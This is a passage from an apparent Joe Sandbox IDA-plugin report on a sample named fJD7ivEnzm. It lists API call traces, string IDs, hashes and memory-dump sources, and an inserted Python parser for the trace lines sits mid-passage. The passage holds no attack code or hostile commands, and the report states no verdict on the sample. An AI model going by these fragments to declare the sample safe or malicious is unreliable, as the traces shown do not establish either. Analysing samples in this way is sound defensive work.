                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$__wcsnicmp
                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                          • API String ID: 790654849-32604322
                                                                          • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                          • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                          • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                          • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                          • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                          • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                          • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                          APIs
                                                                            • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                          • _fseek.LIBCMT ref: 00452B3B
                                                                          • __wsplitpath.LIBCMT ref: 00452B9B
                                                                          • _wcscpy.LIBCMT ref: 00452BB0
                                                                          • _wcscat.LIBCMT ref: 00452BC5
                                                                          • __wsplitpath.LIBCMT ref: 00452BEF
                                                                          • _wcscat.LIBCMT ref: 00452C07
                                                                          • _wcscat.LIBCMT ref: 00452C1C
                                                                          • __fread_nolock.LIBCMT ref: 00452C53
                                                                          • __fread_nolock.LIBCMT ref: 00452C64
                                                                          • __fread_nolock.LIBCMT ref: 00452C83
                                                                          • __fread_nolock.LIBCMT ref: 00452C94
                                                                          • __fread_nolock.LIBCMT ref: 00452CB5
                                                                          • __fread_nolock.LIBCMT ref: 00452CC6
                                                                          • __fread_nolock.LIBCMT ref: 00452CD7
                                                                          • __fread_nolock.LIBCMT ref: 00452CE8
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                          • __fread_nolock.LIBCMT ref: 00452D78
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                          • String ID:
                                                                          • API String ID: 2054058615-0
                                                                          • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                          • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                          • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                          • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window
                                                                          • String ID: 0
                                                                          • API String ID: 2353593579-4108050209
                                                                          • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                          • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                          • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                          • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                          APIs
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                          • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                          • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                          • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                          • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                          • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                          • GetSysColor.USER32(00000008), ref: 0044A265
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                          • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                          • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                          • String ID:
                                                                          • API String ID: 1744303182-0
                                                                          • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                          • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                          • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                          • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                          • __mtterm.LIBCMT ref: 00417C34
                                                                            • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                          • __init_pointers.LIBCMT ref: 00417CE6
                                                                          • __calloc_crt.LIBCMT ref: 00417D54
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                          • API String ID: 4163708885-3819984048
                                                                          • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                          • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                          • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                          • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
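The API lines in these records follow one fixed shape (`<api>.<module>(<args>), ref: <address>`, with an optional `Part of subcall function <address>:` prefix), which makes them easy to mine in bulk, for instance to pull out the names a sample resolves through `GetProcAddress` rather than through its import table. The parser below is an added example written for this page; it is not Joe Sandbox code and not part of the analysed sample. The line format is assumed from the records above, and the embedded input is a constructed test case built from a few lines of the record ending here with the table indentation collapsed.

```python
"""Parse Joe Sandbox IDA-plugin API trace lines into structured records.

Added example for this page; not Joe Sandbox or the sample's own code.
Assumed line shapes (taken from the report records above):
  • <api>.<module>(<arg>,<arg>,...), ref: <hex address>
  • <api>.<module> ref: <hex address>
  • Part of subcall function <hex>: <api>.<module>(...), ref: <hex>
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: a handful of lines copied from the record above,
# with the table indentation collapsed.
SAMPLE_TRACE = """\
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
• __mtterm.LIBCMT ref: 00417C34
  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
• GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
• GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
• TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
• GetCurrentThreadId.KERNEL32 ref: 00417D80
"""

LINE_RE = re.compile(
    r"""^\s*•\s*
        (?:Part\ of\ subcall\ function\ (?P<caller>[0-9A-Fa-f]{8}):\s*)?
        (?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)
        (?:\((?P<args>[^)]*)\))?
        ,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$""",
    re.VERBOSE,
)

HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str                 # e.g. GetProcAddress
    module: str              # e.g. KERNEL32, or LIBCMT for statically linked CRT
    args: List[str]          # raw argument column; "?" means IDA could not resolve it
    ref: str                 # call-site address in the dumped image
    caller: Optional[str]    # set when the line is "Part of subcall function X"


def parse_trace(text: str) -> List[ApiCall]:
    """Turn the bullet lines of one function record into ApiCall objects.
    Lines that do not match the expected shape are skipped rather than
    guessed at, so a mangled line cannot masquerade as a call."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), m.group("caller")))
    return calls


def is_string_arg(arg: str) -> bool:
    """An argument IDA rendered as text rather than as '?' or an 8-digit immediate."""
    return arg != "?" and not HEX8.match(arg)


def dynamically_resolved(calls: List[ApiCall]) -> List[str]:
    """Names passed to GetProcAddress as the second (lpProcName) argument.
    The static import table does not show these, so this is where to look
    for APIs a sample resolves at run time."""
    names = []
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2 and is_string_arg(c.args[1]):
            names.append(c.args[1])
    return names


def by_module(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Group API names by module, first-seen order, de-duplicated."""
    grouped: Dict[str, List[str]] = defaultdict(list)
    for c in calls:
        if c.api not in grouped[c.module]:
            grouped[c.module].append(c.api)
    return dict(grouped)


def subcall_tree(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Map each 'Part of subcall function' address to the APIs it reaches."""
    tree: Dict[str, List[str]] = defaultdict(list)
    for c in calls:
        if c.caller:
            tree[c.caller].append(c.api)
    return dict(tree)


if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    print(f"{len(calls)} calls parsed")
    print("resolved at run time:", dynamically_resolved(calls))
    print("by module:", by_module(calls))
    print("subcalls:", subcall_tree(calls))
```

On the record above this yields `FlsAlloc` and `FlsGetValue` as run-time-resolved names, which here is ordinary CRT thread-local-storage start-up rather than anything sample-specific; the same pass over every record in the report is what separates CRT noise from names a sample resolves on purpose. String arguments are only visible when IDA could recover them, so a `?` in the `lpProcName` slot means the name was computed at run time and must be taken from a memory dump instead.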
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$IconLoad
                                                                          • String ID: blank$info$question$stop$warning
                                                                          • API String ID: 2485277191-404129466
                                                                          • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                          • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                          • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                          • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                          APIs
                                                                          • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                          • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                          • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                          • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                          • GetDesktopWindow.USER32 ref: 0045476F
                                                                          • GetWindowRect.USER32(00000000), ref: 00454776
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                          • GetClientRect.USER32(?,?), ref: 004547D2
                                                                          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                          • String ID:
                                                                          • API String ID: 3869813825-0
                                                                          • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                          • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                          • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                          • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00464B28
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                          • _wcslen.LIBCMT ref: 00464C28
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                          • _wcslen.LIBCMT ref: 00464CBA
                                                                          • _wcslen.LIBCMT ref: 00464CD0
                                                                          • _wcslen.LIBCMT ref: 00464CEF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$Directory$CurrentSystem
                                                                          • String ID: D
                                                                          • API String ID: 1914653954-2746444292
                                                                          • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                          • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                          • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                          • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                          APIs
                                                                          • _wcsncpy.LIBCMT ref: 0045CE39
                                                                          • __wsplitpath.LIBCMT ref: 0045CE78
                                                                          • _wcscat.LIBCMT ref: 0045CE8B
                                                                          • _wcscat.LIBCMT ref: 0045CE9E
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                          • _wcscpy.LIBCMT ref: 0045CF61
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                          • String ID: *.*
                                                                          • API String ID: 1153243558-438819550
                                                                          • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                          • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                          • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                          • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                          Similarity
                                                                          • API ID: __wcsicoll
                                                                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                          • API String ID: 3832890014-4202584635
                                                                          • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                          • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                          • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                          • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                          • GetFocus.USER32 ref: 0046A0DD
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                          Similarity
                                                                          • API ID: MessagePost$CtrlFocus
                                                                          • String ID: 0
                                                                          • API String ID: 1534620443-4108050209
                                                                          • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                          • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                          • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                          • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                          APIs
                                                                          • DestroyWindow.USER32(?), ref: 004558E3
                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                          Similarity
                                                                          • API ID: Window$CreateDestroy
                                                                          • String ID: ,$tooltips_class32
                                                                          • API String ID: 1109047481-3856767331
